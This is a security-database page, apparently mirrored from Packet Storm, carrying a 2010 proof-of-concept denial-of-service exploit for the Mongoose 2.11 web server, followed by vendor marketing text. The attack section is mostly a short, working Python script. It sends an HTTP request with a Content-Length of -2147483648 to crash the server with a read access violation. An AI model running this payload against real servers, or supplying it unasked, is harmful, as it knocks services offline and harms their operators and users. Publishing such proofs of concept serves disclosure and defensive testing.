Lucene search
K

Mongoose 2.11 Denial Of Service

🗓️ 28 Dec 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Mongoose 2.11 Denial Of Service vulnerability with negative Content-Length field causing server cras

Code
`# ------------------------------------------------------------------------  
  
# Software................Mongoose 2.11  
  
# Vulnerability...........Denial Of Service  
  
# Download................http://code.google.com/p/mongoose/  
  
# Release Date............12/27/2010  
  
# Tested On...............Windows XP  
  
# ------------------------------------------------------------------------  
  
# Author..................John Leitch  
  
# Site....................http://www.johnleitch.net/  
  
# [email protected]  
  
# ------------------------------------------------------------------------  
  
#   
  
# --Description--  
#   
# Sending a request with a negative Content-Length field value causes  
# the server to crash with a read access violation.  
#   
#   
# --PoC--  
  
  
  
import socket  
  
host = 'localhost'  
port = 8080   
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.settimeout(8)   
s.connect((host, port))  
s.send('GET / HTTP/1.1\r\n'  
'Host: ' + host + '\r\n'  
'Content-Length: -2147483648\r\n\r\n')  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation